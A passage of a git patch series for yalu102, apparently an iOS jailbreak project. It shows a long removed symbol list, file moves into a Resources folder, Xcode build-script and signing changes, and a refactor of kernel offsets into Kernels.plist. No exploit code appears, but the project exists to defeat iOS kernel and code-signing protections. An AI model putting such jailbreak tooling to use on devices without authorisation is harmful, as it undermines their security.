_IOUSBDeviceDescriptionGetClass, _IOUSBDeviceDescriptionGetManufacturerString, - _IOUSBDeviceDescriptionGetMatchingConfiguration, - _IOUSBDeviceDescriptionGetProductID, _IOUSBDeviceDescriptionGetProductString, - _IOUSBDeviceDescriptionGetProtocol, _IOUSBDeviceDescriptionGetSerialString, - _IOUSBDeviceDescriptionGetSubClass, _IOUSBDeviceDescriptionGetVendorID, - _IOUSBDeviceDescriptionGetVersion, _IOUSBDeviceDescriptionRemoveAllConfigurations, - _IOUSBDeviceDescriptionSetAllowOverride, _IOUSBDeviceDescriptionSetClass, - _IOUSBDeviceDescriptionSetProductID, _IOUSBDeviceDescriptionSetProtocol, - _IOUSBDeviceDescriptionSetSerialString, _IOUSBDeviceDescriptionSetSubClass, - _IOUSBDeviceDescriptionSetVendorID, _NXClickTime, - _NXCloseEventStatus, _NXEventSystemInfo, _NXGetClickSpace, - _NXGetKeyMapping, _NXKeyMappingLength, _NXKeyRepeatInterval, - _NXKeyRepeatThreshold, _NXOpenEventStatus, _NXResetKeyboard, - _NXResetMouse, _NXSetClickSpace, _NXSetClickTime, - _NXSetKeyMapping, _NXSetKeyRepeatInterval, _NXSetKeyRepeatThreshold, - _OSGetNotificationFromMessage, _OSKextAuthenticate, - _OSKextAuthenticateDependencies, _OSKextCopyAllDependencies, - _OSKextCopyAllRequestedIdentifiers, _OSKextCopyArchitectures, - _OSKextCopyContainerForPluginKext, _OSKextCopyDeclaredDependencies, - _OSKextCopyDependents, _OSKextCopyDiagnostics, _OSKextCopyExecutableForArchitecture, - _OSKextCopyIndirectDependencies, _OSKextCopyInfoDictionary, - _OSKextCopyKextsWithIdentifier, _OSKextCopyKextsWithIdentifiers, - _OSKextCopyLinkDependencies, _OSKextCopyLoadList, - _OSKextCopyLoadListForKexts, _OSKextCopyLoadedKextInfo, - _OSKextCopyPersonalitiesArray, _OSKextCopyPersonalitiesOfKexts, - _OSKextCopyPlugins, _OSKextCopyResource, _OSKextCopyUUIDForArchitecture, - _OSKextCreate, _OSKextCreateKextsFromMkextData, - _OSKextCreateKextsFromMkextFile, _OSKextCreateKextsFromURL, - _OSKextCreateKextsFromURLs, _OSKextCreateLoadedKextInfo, - _OSKextCreateMkext, _OSKextCreateWithIdentifier, - _OSKextDeclaresExecutable, _OSKextDependenciesAreLoadableInSafeBoot, - _OSKextDependsOnKext, _OSKextFilterRequiredKexts, - _OSKextFindLinkDependencies, _OSKextFlushDependencies, - _OSKextFlushDiagnostics, _OSKextFlushInfoDictionary, - _OSKextFlushLoadInfo, _OSKextGetActualSafeBoot, - _OSKextGetAllKexts, _OSKextGetArchitecture, _OSKextGetCompatibleKextWithIdentifier, - _OSKextGetCompatibleVersion, _OSKextGetIdentifier, - _OSKextGetKextWithIdentifier, _OSKextGetKextWithIdentifierAndVersion, - _OSKextGetKextWithURL, _OSKextGetLoadAddress, _OSKextGetLoadTag, - _OSKextGetLoadedKextWithIdentifier, _OSKextGetLogFilter, - _OSKextGetRecordsDiagnostics, _OSKextGetRunningKernelArchitecture, - _OSKextGetSimulatedSafeBoot, _OSKextGetSystemExtensionsFolderURLs, - _OSKextGetTypeID, _OSKextGetURL, _OSKextGetUsesCaches, - _OSKextGetValueForInfoDictionaryKey, _OSKextGetVersion, - _OSKextHasLogOrDebugFlags, _OSKextIsAuthentic, _OSKextIsCompatibleWithVersion, - _OSKextIsFromMkext, _OSKextIsInterface, _OSKextIsKernelComponent, - _OSKextIsLibrary, _OSKextIsLoadable, _OSKextIsLoadableInSafeBoot, - _OSKextIsLoaded, _OSKextIsLoggingEnabled, _OSKextIsPlugin, - _OSKextIsStarted, _OSKextIsValid, _OSKextLoad, _OSKextLoadWithOptions, - _OSKextLog, _OSKextLogCFString, _OSKextLogDependencyGraph, - _OSKextLogDiagnostics, _OSKextMatchesRequiredFlags, - _OSKextOtherVersionIsLoaded, _OSKextParseVersionCFString, - _OSKextParseVersionString, _OSKextReadLoadedKextInfo, - _OSKextRemoveKextPersonalitiesFromKernel, _OSKextRemovePersonalitiesForIdentifierFromKernel, - _OSKextResolveDependencies, _OSKextSendKextPersonalitiesToKernel, - _OSKextSendPersonalitiesOfKextsToKernel, _OSKextSendPersonalitiesToKernel, - _OSKextSetArchitecture, _OSKextSetLoadAddress, _OSKextSetLogFilter, - _OSKextSetLogOutputFunction, _OSKextSetLoggingEnabled, - _OSKextSetRecordsDiagnostics, _OSKextSetSimulatedSafeBoot, - _OSKextSetUsesCaches, _OSKextStart, _OSKextStop, - _OSKextSupportsArchitecture, _OSKextUnload, _OSKextUnloadKextWithIdentifier, - _OSKextVLog, _OSKextVLogCFString, _OSKextValidate, - _OSKextValidateDependencies, _OSKextVersionGetString, - __CFURLCopyAbsolutePath, __IOAVStringAppendIndendationAndFormat, - __IODataQueueEnqueueWithReadCallback, __IODispatchCalloutWithDispatch, - __IOHIDCallbackApplier, __IOHIDCopyServiceIDs, __IOHIDCreateBinaryData, - __IOHIDDeviceGetIOCFPlugInInterface, __IOHIDElementCreateWithElement, - __IOHIDElementCreateWithParentAndData, __IOHIDElementGetCalibrationInfo, - __IOHIDElementGetFlags, __IOHIDElementGetLength, - __IOHIDElementGetValue, __IOHIDElementSetDevice, - __IOHIDElementSetDeviceInterface, __IOHIDElementSetValue, - __IOHIDEventCopyCFTypeContext, __IOHIDEventGetContext, - __IOHIDEventSetCFTypeContext, __IOHIDEventSetContext, - __IOHIDEventSystemAddConnection, __IOHIDEventSystemAddService, - __IOHIDEventSystemAddServiceForConnection, __IOHIDEventSystemClientCopyClientRecords, - __IOHIDEventSystemClientCopyEventForService, __IOHIDEventSystemClientCopyPropertyForService, - __IOHIDEventSystemClientCopyServiceRecords, __IOHIDEventSystemClientDispatchEventFilter, - __IOHIDEventSystemClientDispatchPropertiesChanged, - __IOHIDEventSystemClientRegisterClientRecordsChangedBlock, - __IOHIDEventSystemClientRegisterClientRecordsChangedCallback, - __IOHIDEventSystemClientRegisterServiceRecordsChangedBlock, - __IOHIDEventSystemClientRegisterServiceRecordsChangedCallback, - __IOHIDEventSystemClientServiceConformsTo, __IOHIDEventSystemClientSetElementValueForService, - __IOHIDEventSystemClientSetPropertyForService, __IOHIDEventSystemClientUnregisterClientRecordsChangedBlock, - __IOHIDEventSystemClientUnregisterClientRecordsChangedCallback, - __IOHIDEventSystemClientUnregisterServiceRecordsChangedBlock, - __IOHIDEventSystemClientUnregisterServiceRecordsChangedCallback, - __IOHIDEventSystemConnectionAddNotification, __IOHIDEventSystemConnectionAddServices, - __IOHIDEventSystemConnectionContainsEntitlement, - __IOHIDEventSystemConnectionContainsService, __IOHIDEventSystemConnectionCopyQueue, - __IOHIDEventSystemConnectionCopyRecord, __IOHIDEventSystemConnectionCopyServices, - __IOHIDEventSystemConnectionCreate, __IOHIDEventSystemConnectionEventFilterCompare, - __IOHIDEventSystemConnectionFilterEvent, __IOHIDEventSystemConnectionGetEventFilterPriority, - __IOHIDEventSystemConnectionGetExecutablePath, __IOHIDEventSystemConnectionGetPID, - __IOHIDEventSystemConnectionGetPort, __IOHIDEventSystemConnectionGetReplyPort, - __IOHIDEventSystemConnectionGetSystem, __IOHIDEventSystemConnectionPropertyChanged, - __IOHIDEventSystemConnectionQueueStart, __IOHIDEventSystemConnectionQueueStop, - __IOHIDEventSystemConnectionRecordClientChanged, - __IOHIDEventSystemConnectionRecordServiceChanged, - __IOHIDEventSystemConnectionRegisterDemuxCallback, - __IOHIDEventSystemConnectionRegisterEventFilter, - __IOHIDEventSystemConnectionRegisterPropertyChangedNotification, - __IOHIDEventSystemConnectionRegisterRecordClientChanged, - __IOHIDEventSystemConnectionRegisterRecordServiceChanged, - __IOHIDEventSystemConnectionRegisterTerminationCallback, - __IOHIDEventSystemConnectionRemoveAllServices, __IOHIDEventSystemConnectionRemoveNotification, - __IOHIDEventSystemConnectionRemoveService, __IOHIDEventSystemConnectionScheduleAsync, - __IOHIDEventSystemConnectionSetQueue, __IOHIDEventSystemConnectionUnregisterEventFilter, - __IOHIDEventSystemConnectionUnregisterPropertyChangedNotification, - __IOHIDEventSystemConnectionUnregisterRecordClientChanged, - __IOHIDEventSystemConnectionUnregisterRecordServiceChanged, - __IOHIDEventSystemConnectionUnscheduleAsync, __IOHIDEventSystemCopyRecord, - __IOHIDEventSystemDispatchEvent, __IOHIDEventSystemGetPropertyForConnection, - __IOHIDEventSystemPropertyChanged, __IOHIDEventSystemRegisterEventFilter, - __IOHIDEventSystemRegisterRecordClientChanged, __IOHIDEventSystemRegisterRecordServiceChanged, - __IOHIDEventSystemRemoveConnection, __IOHIDEventSystemRemoveService, - __IOHIDEventSystemRemoveServicesForConnection, __IOHIDEventSystemSetPropertyForConnection, - __IOHIDEventSystemUnregisterEventFilter, __IOHIDEventSystemUnregisterRecordClientChanged, - __IOHIDEventSystemUnregisterRecordServiceChanged, - __IOHIDHasEntitlement, __IOHIDLoadBundles, __IOHIDLog, - __IOHIDQueueCopyElements, __IOHIDSerialize, __IOHIDServiceAddConnection, - __IOHIDServiceClientCreate, __IOHIDServiceClientDispatchServiceRemoval, - __IOHIDServiceClientRefresh, __IOHIDServiceClose, - __IOHIDServiceContainsReportInterval, __IOHIDServiceContainsReportIntervalForClient, - __IOHIDServiceCopyConnections, __IOHIDServiceCopyDebugDescriptionForClient, - __IOHIDServiceCopyDispatchQueue, __IOHIDServiceCopyPropertyForClient, - __IOHIDServiceCopyRecordForClient, __IOHIDServiceCreate, - __IOHIDServiceCreateVirtual, __IOHIDServiceGetEventDeadlineForClient, - __IOHIDServiceGetOwner, __IOHIDServiceGetReportInterval, - __IOHIDServiceGetReportIntervalForClient, __IOHIDServiceIsInactive, - __IOHIDServiceOpen, __IOHIDServiceRemoveConnection, - __IOHIDServiceRemovePropertiesForClient, __IOHIDServiceScheduleAsync, - __IOHIDServiceSetBatchIntervalForClient, __IOHIDServiceSetEventCallback, - __IOHIDServiceSetEventDeadlineForClient, __IOHIDServiceSetPropertyForClient, - __IOHIDServiceSetReportIntervalForClient, __IOHIDServiceUnscheduleAsync, - __IOHIDSessionDispatchEvent, __IOHIDSessionGetPropertyForClient, - __IOHIDSessionSetPropertyForClient, __IOHIDStringAppendIndendationAndFormat, - __IOHIDUnserializeAndVMDealloc, __IOHIDUnserializeAndVMDeallocWithTypeID, - __IOHIDValueCopyToElementValuePtr, __IOHIDValueCreateWithElementValuePtr, - __IOHIDValueCreateWithStruct, __IOObjectCFRelease, - __IOObjectCFRetain, __IOObjectConformsTo, __IOObjectCopyClass, - __IOObjectGetClass, __IOReadBytesFromFile, __IOServiceGetAuthorizationID, - __IOServiceSetAuthorizationID, __IOUSBDeviceDescriptionGetInfo, - __IOWriteBytesToFile, __OSKextCopyKernelRequests, - __OSKextCreateFolderForCacheURL, __OSKextReadCache, - __OSKextReadFromIdentifierCacheForFolder, __OSKextSendResource, - __OSKextSetStrictRecordingByLastOpened, __OSKextWriteCache, - __OSKextWriteIdentifierCacheForKextsInDirectory, - ___CachedPropertiesRefreshApplierFunction, ___ConnectionFunctionPickBatchInterval, - ___GDBIOHIDEventSystemDump, ___IOHIDApplyPropertiesToDeviceFromDictionary, - ___IOHIDApplyPropertyToDeviceSet, ___IOHIDDeviceGetRootKey, - ___IOHIDDeviceGetUUIDKey, ___IOHIDDeviceGetUUIDString, - ___IOHIDDeviceLoadProperties, ___IOHIDDeviceSaveProperties, - ___IOHIDElementGetRootKey, ___IOHIDElementLoadProperties, - ___IOHIDElementRegister, ___IOHIDElementSaveProperties, - ___IOHIDEventSystemClientRefresh, ___IOHIDEventSystemClientRefreshServiceCallback, - ___IOHIDEventSystemClientServiceReplaceCallback, - ___IOHIDEventSystem_debug, ___IOHIDLoadElementSet, - ___IOHIDManagerGetRootKey, ___IOHIDManagerLoadProperties, - ___IOHIDManagerRegister, ___IOHIDManagerSaveProperties, - ___IOHIDNotificationRegister, ___IOHIDPropertyLoadDictionaryFromKey, - ___IOHIDPropertyLoadFromKeyWithSpecialKeys, ___IOHIDPropertySaveToKeyWithSpecialKeys, - ___IOHIDPropertySaveWithContext, ___IOHIDQueueRegister, - ___IOHIDSaveDeviceSet, ___IOHIDSaveElementSet, ___IOHIDServicePickBatchInterval, - ___IOHIDSession, ___IOHIDSessionRef, ___IOHIDTransactionRegister, - ___IOHIDValueRegister, ___IOUSBDeviceDescriptionRegister, - ___OSKextBundleIDCompare, ___OSKextCacheNeedsUpdate, - ___OSKextCheckURL, ___OSKextClearHasAllDependenciesOnKext, - ___OSKextCompareIdentifiers, ___OSKextCopyExecutableRelativePath, - ___OSKextCreateCacheFileURL, ___OSKextCreateCompositeKey, - ___OSKextCreateFromIdentifierCacheDict, ___OSKextCreateIdentifierCacheDict, - ___OSKextCreateKextRequest, ___OSKextDeallocateMmapBuffer, - ___OSKextGetBleedthroughFlag, ___OSKextLogDependencyGraphApplierFunction, - ___OSKextLogKernelMessages, ___OSKextMapExecutable, - ___OSKextProcessKextRequestResults, ___OSKextReadRegistryNumberProperty, - ___OSKextRealize, ___OSKextRealizeKextsWithIdentifier, - ___OSKextRemoveIdentifierCacheForKext, ___OSKextRemovePersonalities, - ___OSKextSendKextRequest, ___OSKextSetLoadAddress, - ___OSKextStatURL, ___OSKextStatURLsOrURL, ___OSKextURLIsSystemFolder, - ___OSKextUUIDCallback, ___OSKextUnload, ___SetNumPropertyForService, - ___absPathOnVolume, ___kOSKextDiagnosticsFlagAllImplemented, - ___sOSKextDefaultLogFunction, ___sOSKextLogOutputFunction, - ___uuid_callback, __io_hideventsystem_clear_service_cache, - __io_hideventsystem_copy_client_records, __io_hideventsystem_copy_event_for_service, - __io_hideventsystem_copy_matching_services, __io_hideventsystem_copy_property, - __io_hideventsystem_copy_property_for_service, __io_hideventsystem_copy_service_records, - __io_hideventsystem_dispatch_event, __io_hideventsystem_open, - __io_hideventsystem_queue_create, __io_hideventsystem_queue_start, - __io_hideventsystem_queue_stop, __io_hideventsystem_register_event_filter, - __io_hideventsystem_register_property_changed_notification, - __io_hideventsystem_register_record_client_changed_notification, - __io_hideventsystem_register_record_service_changed_notification, - __io_hideventsystem_release_notification, __io_hideventsystem_service_conforms_to, - __io_hideventsystem_set_element_value_for_service, - __io_hideventsystem_set_properties, __io_hideventsystem_set_properties_for_service, - __io_hideventsystem_unregister_event_filter, __io_hideventsystem_unregister_property_changed_notification, - __io_hideventsystem_unregister_record_client_changed_notification, - __io_hideventsystem_unregister_record_service_changed_notification, - __io_kSCCompAnyRegex, __io_kSCDynamicStoreDomainState, - __iohideventsystem_client_dispatch_client_records_changed, - __iohideventsystem_client_dispatch_event_filter, - __iohideventsystem_client_dispatch_notification_results, - __iohideventsystem_client_dispatch_properties_changed, - __iohideventsystem_client_dispatch_service_records_changed, - __iohideventsystem_client_dispatch_service_removal, - __iohideventsystem_client_subsystem, __iohideventsystem_subsystem, - __isArray, __isDictionary, __isString, __pm_connect, - __pm_disconnect, _createCFStringForData, _createCFStringForPlist_new, - _createUTF8CStringForCFString, _defaultSettings, - _ev_try_lock, _ev_unlock, _fat_iterator_close, _fat_iterator_file_end, - _fat_iterator_file_start, _fat_iterator_find_arch, - _fat_iterator_find_fat_arch, _fat_iterator_find_host_arch, - _fat_iterator_for_data, _fat_iterator_is_iterable, - _fat_iterator_next_arch, _fat_iterator_num_arches, - _fat_iterator_open, _fat_iterator_reset, _gIOCFPlugInInterfaceID, - _gIOKitLibSerializeOptions, _gIOKitLibServerVersion, - _getEffectivePageSize, _hid_dispatch_pthread_root_queue_create, - _hid_dispatch_queue_create, _hid_dispatch_queue_release, - _hid_pthread_attr_init, _io_hideventsystem_clear_service_cache, - _io_hideventsystem_copy_client_records, _io_hideventsystem_copy_event_for_service, - _io_hideventsystem_copy_matching_services, _io_hideventsystem_copy_property, - _io_hideventsystem_copy_property_for_service, _io_hideventsystem_copy_service_records, - _io_hideventsystem_dispatch_event, _io_hideventsystem_open, - _io_hideventsystem_queue_create, _io_hideventsystem_queue_start, - _io_hideventsystem_queue_stop, _io_hideventsystem_register_event_filter, - _io_hideventsystem_register_property_changed_notification, - _io_hideventsystem_register_record_client_changed_notification, - _io_hideventsystem_register_record_service_changed_notification, - _io_hideventsystem_release_notification, _io_hideventsystem_service_conforms_to, - _io_hideventsystem_set_element_value_for_service, - _io_hideventsystem_set_properties, _io_hideventsystem_set_properties_for_service, - _io_hideventsystem_unregister_event_filter, _io_hideventsystem_unregister_property_changed_notification, - _io_hideventsystem_unregister_record_client_changed_notification, - _io_hideventsystem_unregister_record_service_changed_notification, - _io_pm_assertion_activity_aggregate, _io_pm_assertion_activity_log, - _io_pm_assertion_copy_details, _io_pm_assertion_create, - _io_pm_assertion_notify, _io_pm_assertion_retain_release, - _io_pm_assertion_set_properties, _io_pm_cancel_repeat_events, - _io_pm_change_sa_assertion_behavior, _io_pm_connection_acknowledge_event, - _io_pm_connection_copy_status, _io_pm_connection_create, - _io_pm_connection_release, _io_pm_connection_schedule_notification, - _io_pm_ctl_assertion_type, _io_pm_declare_network_client_active, - _io_pm_declare_system_active, _io_pm_declare_user_active, - _io_pm_force_active_settings, _io_pm_get_capability_bits, - _io_pm_get_uuid, _io_pm_get_value_int, _io_pm_hid_event_copy_history, - _io_pm_hid_event_report_activity, _io_pm_last_wake_time, - _io_pm_schedule_power_event, _io_pm_schedule_repeat_event, - _io_pm_set_active_profile, _io_pm_set_bt_wake_interval, - _io_pm_set_debug_flags, _io_pm_set_dw_linger_interval, - _io_pm_set_sleepservice_wake_time_cap, _io_pm_set_value_int, - _io_ps_copy_chargelog, _io_ps_copy_powersources_info, - _io_ps_new_pspowersource, _io_ps_release_pspowersource, - _io_ps_update_pspowersource, _iohideventsystem_client_dispatch_client_records_changed, - _iohideventsystem_client_dispatch_event_filter, - _iohideventsystem_client_dispatch_notification_results, - _iohideventsystem_client_dispatch_properties_changed, - _iohideventsystem_client_dispatch_service_records_changed, - _iohideventsystem_client_dispatch_service_removal, - _iohideventsystem_client_server, _iohideventsystem_client_server_routine, - _iohideventsystem_server, _iohideventsystem_server_routine, - _iokit_user_client_trap, _isCrossLinking, _kIOEthernetHardwareAddress, - _kIOHIDEventSystemConnectionDispatchFilterWaitTimeoutMS, - _kIOHIDFilterPluginArrayCallBacks, _kIOHIDServerConnectionRootQueue, - _kIOHIDServiceEnumerationRootQueue, _kIOHIDServiceInterruptRootQueue, - _kIOMasterPortDefault, _kIOUserEthernetInterfaceMergeProperties, - _kIOUserEthernetInterfaceRole, _kOSKextDependencyCircularReference, - _kOSKextDependencyCompatibleVersionUndeclared, _kOSKextDependencyInauthentic, - _kOSKextDependencyIndirectDependencyUnresolvable, - _kOSKextDependencyIneligibleInSafeBoot, _kOSKextDependencyInvalid, - _kOSKextDependencyLoadedCompatibleVersionUndeclared, - _kOSKextDependencyLoadedIsIncompatible, _kOSKextDependencyMultipleVersionsDetected, - _kOSKextDependencyNoCompatibleVersion, _kOSKextDependencyRawAndComponentKernel, - _kOSKextDependencyUnavailable, _kOSKextDiagnosticBadPropertyListXMLKey, - _kOSKextDiagnosticBadSystemPropertyKey, _kOSKextDiagnosticBundleIdentifierMismatchKey, - _kOSKextDiagnosticBundleVersionMismatchKey, _kOSKextDiagnosticCodelessWithLibrariesKey, - _kOSKextDiagnosticCompatibleVersionLaterThanVersionKey, - _kOSKextDiagnosticDeclaresBothKernelAndKPIDependenciesKey, - _kOSKextDiagnosticDeclaresNoKPIsWarningKey, _kOSKextDiagnosticDeclaresNonKPIDependenciesKey, - _kOSKextDiagnosticDeprecatedPropertyKey, _kOSKextDiagnosticExecutableArchNotFoundKey, - _kOSKextDiagnosticExecutableBadKey, _kOSKextDiagnosticExecutableMissingKey, - _kOSKextDiagnosticFileAccessKey, _kOSKextDiagnosticFileNotFoundKey, - _kOSKextDiagnosticIdentifierOrVersionTooLongKey, - _kOSKextDiagnosticIneligibleInSafeBoot, _kOSKextDiagnosticKernelComponentNotInterfaceKey, - _kOSKextDiagnosticMissingPropertyKey, _kOSKextDiagnosticNoExplicitKernelDependencyKey, - _kOSKextDiagnosticNoFileKey, _kOSKextDiagnosticNonAppleKextDeclaresPrivateKPIDependencyKey, - _kOSKextDiagnosticNonuniqueIOResourcesMatchKey, - _kOSKextDiagnosticNotABundleKey, _kOSKextDiagnosticNotSignedKey, - _kOSKextDiagnosticOwnerPermissionKey, _kOSKextDiagnosticPersonalityHasDifferentBundleIdentifierKey, - _kOSKextDiagnosticPersonalityHasNoBundleIdentifierKey, - _kOSKextDiagnosticPersonalityNamesKextWithNoExecutableKey, - _kOSKextDiagnosticPersonalityNamesNonloadableKextKey, - _kOSKextDiagnosticPersonalityNamesUnknownKextKey, - _kOSKextDiagnosticPropertyIsIllegalTypeKey, _kOSKextDiagnosticPropertyIsIllegalValueKey, - _kOSKextDiagnosticRawKernelDependency, _kOSKextDiagnosticSharedExecutableAndExecutableKey, - _kOSKextDiagnosticSharedExecutableKextMissingKey, - _kOSKextDiagnosticStatFailureKey, _kOSKextDiagnosticSymlinkKey, - _kOSKextDiagnosticTypeWarningKey, _kOSKextDiagnosticURLConversionKey, - _kOSKextDiagnosticsAuthenticationKey, _kOSKextDiagnosticsBootLevelKey, - _kOSKextDiagnosticsDependenciesKey, _kOSKextDiagnosticsDependencyNotOSBundleRequired, - _kOSKextDiagnosticsInterfaceDependencyCount, _kOSKextDiagnosticsValidationKey, - _kOSKextDiagnosticsWarningsKey, _kOSKextLoadNotification, - _kOSKextUnloadNotification, _macho_find_dysymtab, - _macho_find_section_numbered, _macho_find_source_version, - _macho_find_symbol, _macho_find_symtab, _macho_find_uuid, - _macho_get_section_by_name, _macho_get_section_by_name_64, - _macho_get_segment_by_name, _macho_get_segment_by_name_64, - _macho_remove_linkedit, _macho_scan_load_commands, - _macho_swap, _macho_trim_linkedit, _macho_unswap, - _previouslySerialized, _printPList_new, _recordObjectInIDRefDictionary, - _roundPageCrossSafe, _roundPageCrossSafeFixedWidth, - _setCrossLinkPageSize, _showPList_new ] -... diff --git a/yalu102/0.reload.plist b/yalu102/Resources/0.reload.plist similarity index 100% rename from yalu102/0.reload.plist rename to yalu102/Resources/0.reload.plist diff --git a/yalu102/bootstrap.tar b/yalu102/Resources/bootstrap.tar similarity index 100% rename from yalu102/bootstrap.tar rename to yalu102/Resources/bootstrap.tar diff --git a/yalu102/launchctl b/yalu102/Resources/launchctl similarity index 100% rename from yalu102/launchctl rename to yalu102/Resources/launchctl diff --git a/yalu102/reload b/yalu102/Resources/reload similarity index 100% rename from yalu102/reload rename to yalu102/Resources/reload diff --git a/yalu102/tar b/yalu102/Resources/tar old mode 100644 new mode 100755 similarity index 100% rename from yalu102/tar rename to yalu102/Resources/tar From d4d316924d027c220a3e4743c17814cd24ea77c3 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sat, 28 Jan 2017 19:09:28 +0100 Subject: [PATCH 06/34] Add bootstrap.tar temporary directory to .gitignore --- yalu102/Resources/.gitignore | 1 + 1 file changed, 1 insertion(+) create mode 100644 yalu102/Resources/.gitignore diff --git a/yalu102/Resources/.gitignore b/yalu102/Resources/.gitignore new file mode 100644 index 0000000..b7c200a --- /dev/null +++ b/yalu102/Resources/.gitignore @@ -0,0 +1 @@ +bootstrap From 60c2139ee7b24cae25431d908fa4afb0c728d08b Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sat, 28 Jan 2017 19:12:56 +0100 Subject: [PATCH 07/34] Use iOS libkern headers with OSTypes.h from macOS This avoids clashes if any iOS library should depend on quirks of the iOS libkern headers or includes them directly. However, OSTypes.h is missing from the iOS SDK. The rather short file from the macOS SDK is compatible. --- yalu102.xcodeproj/project.pbxproj | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index 815b12f..3d08201 100644 --- a/yalu102.xcodeproj/project.pbxproj +++ b/yalu102.xcodeproj/project.pbxproj @@ -245,7 +245,7 @@ ); runOnlyForDeploymentPostprocessing = 0; shellPath = /bin/sh; - shellScript = "set -x\nset -e\nDESTPATH=\"$PROJECT_DIR/yalu102/include\"\nMACOSSDK=\"$PLATFORM_DIR/../MacOSX.platform/Developer/SDKs/MacOSX.sdk\"\nif [ ! -e \"$DESTPATH/IOKit\" ]; then\n ln -s \"$MACOSSDK/System/Library/Frameworks/IOKit.framework/Headers\" \"$DESTPATH/IOKit\"\nfi\nif [ ! -e \"$DESTPATH/libkern\" ]; then\n ln -s \"$MACOSSDK/usr/include/libkern\" \"$DESTPATH/libkern\"\nfi\n"; + shellScript = "set -x\nset -e\nDESTPATH=\"$PROJECT_DIR/yalu102/include\"\nMACOSSDK=\"$PLATFORM_DIR/../MacOSX.platform/Developer/SDKs/MacOSX.sdk\"\nif [ ! -e \"$DESTPATH/IOKit\" ]; then\n ln -s \"$MACOSSDK/System/Library/Frameworks/IOKit.framework/Headers\" \"$DESTPATH/IOKit\"\nfi\n\nif [ ! -e \"$DESTPATH/libkern\" ]; then\n mkdir -p \"$DESTPATH/libkern\"\n ln -s \"$MACOSSDK/usr/include/libkern/OSTypes.h\" \"$DESTPATH/libkern/OSTypes.h\"\nfi\n"; }; /* End PBXShellScriptBuildPhase section */ From c6d404b412491912b5cce963540e73a24b5a8f9f Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sat, 28 Jan 2017 19:20:42 +0100 Subject: [PATCH 08/34] Clear automated code signing settings --- yalu102.xcodeproj/project.pbxproj | 1 - 1 file changed, 1 deletion(-) diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index d228134..339b0ba 100644 --- a/yalu102.xcodeproj/project.pbxproj +++ b/yalu102.xcodeproj/project.pbxproj @@ -169,7 +169,6 @@ TargetAttributes = { EA9900E21E1E9F060056FEBD = { CreatedOnToolsVersion = 8.2.1; - DevelopmentTeam = CGTX3WH3ZS; ProvisioningStyle = Automatic; }; }; From da39f9bf4e4d53f795e3b7351afe76e3377609eb Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 14:57:08 +0100 Subject: [PATCH 09/34] Refactor offsets.c into Kernels.plist, remove devicesupport.h/m --- yalu102.xcodeproj/project.pbxproj | 31 +-- yalu102/AppDelegate.h | 2 - yalu102/AppDelegate.m | 7 - yalu102/Kernels.plist | 260 ++++++++++++++++++++++ yalu102/Resources/reload | 1 - yalu102/ViewController.m | 24 +- yalu102/csflags.h | 26 +++ yalu102/devicesupport.m | 50 ----- yalu102/jailbreak.h | 7 + yalu102/jailbreak.m | 30 +-- yalu102/{devicesupport.h => mac_policy.h} | 42 +--- yalu102/offsets.c | 103 --------- yalu102/offsets.h | 37 --- yalu102/patchfinder64.h | 42 +--- 14 files changed, 340 insertions(+), 322 deletions(-) create mode 100644 yalu102/Kernels.plist create mode 100644 yalu102/csflags.h delete mode 100644 yalu102/devicesupport.m create mode 100644 yalu102/jailbreak.h rename yalu102/{devicesupport.h => mac_policy.h} (89%) delete mode 100644 yalu102/offsets.c delete mode 100644 yalu102/offsets.h diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index 339b0ba..bacd1e8 100644 --- a/yalu102.xcodeproj/project.pbxproj +++ b/yalu102.xcodeproj/project.pbxproj @@ -7,6 +7,8 @@ objects = { /* Begin PBXBuildFile section */ + A70DFA9E1E3D332500769FE9 /* include in Resources */ = {isa = PBXBuildFile; fileRef = A70DFA9D1E3D332500769FE9 /* include */; }; + A70DFAA11E3D35AC00769FE9 /* Kernels.plist in Resources */ = {isa = PBXBuildFile; fileRef = A70DFAA01E3D35AC00769FE9 /* Kernels.plist */; }; A72023721E3CFC2B00FADBFF /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = A72023711E3CFBCA00FADBFF /* IOKit.framework */; }; EA1A3B9D1E391C4F009CA025 /* patchfinder64.o in Frameworks */ = {isa = PBXBuildFile; fileRef = EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */; }; EA1A3BA81E398E33009CA025 /* 0.reload.plist in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BA61E398E33009CA025 /* 0.reload.plist */; }; @@ -17,15 +19,18 @@ EA9900EE1E1E9F060056FEBD /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9900ED1E1E9F060056FEBD /* ViewController.m */; }; EA9900F11E1E9F060056FEBD /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EA9900EF1E1E9F060056FEBD /* Main.storyboard */; }; EA9900F61E1E9F060056FEBD /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */; }; - EA9901041E219C210056FEBD /* offsets.c in Sources */ = {isa = PBXBuildFile; fileRef = EA9901021E219C210056FEBD /* offsets.c */; }; EA9901061E219FF10056FEBD /* bootstrap.tar in Resources */ = {isa = PBXBuildFile; fileRef = EA9901051E219FF10056FEBD /* bootstrap.tar */; }; EA99010A1E21A04C0056FEBD /* tar in Resources */ = {isa = PBXBuildFile; fileRef = EA9901091E21A04C0056FEBD /* tar */; }; EA99010C1E21A0520056FEBD /* launchctl in Resources */ = {isa = PBXBuildFile; fileRef = EA99010B1E21A0520056FEBD /* launchctl */; }; EA99010E1E21A1560056FEBD /* jailbreak.m in Sources */ = {isa = PBXBuildFile; fileRef = EA99010D1E21A1560056FEBD /* jailbreak.m */; }; - EA9901171E21A1D90056FEBD /* devicesupport.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9901161E21A1D90056FEBD /* devicesupport.m */; }; /* End PBXBuildFile section */ /* Begin PBXFileReference section */ + A70DFA9C1E3D314F00769FE9 /* jailbreak.h */ = {isa = 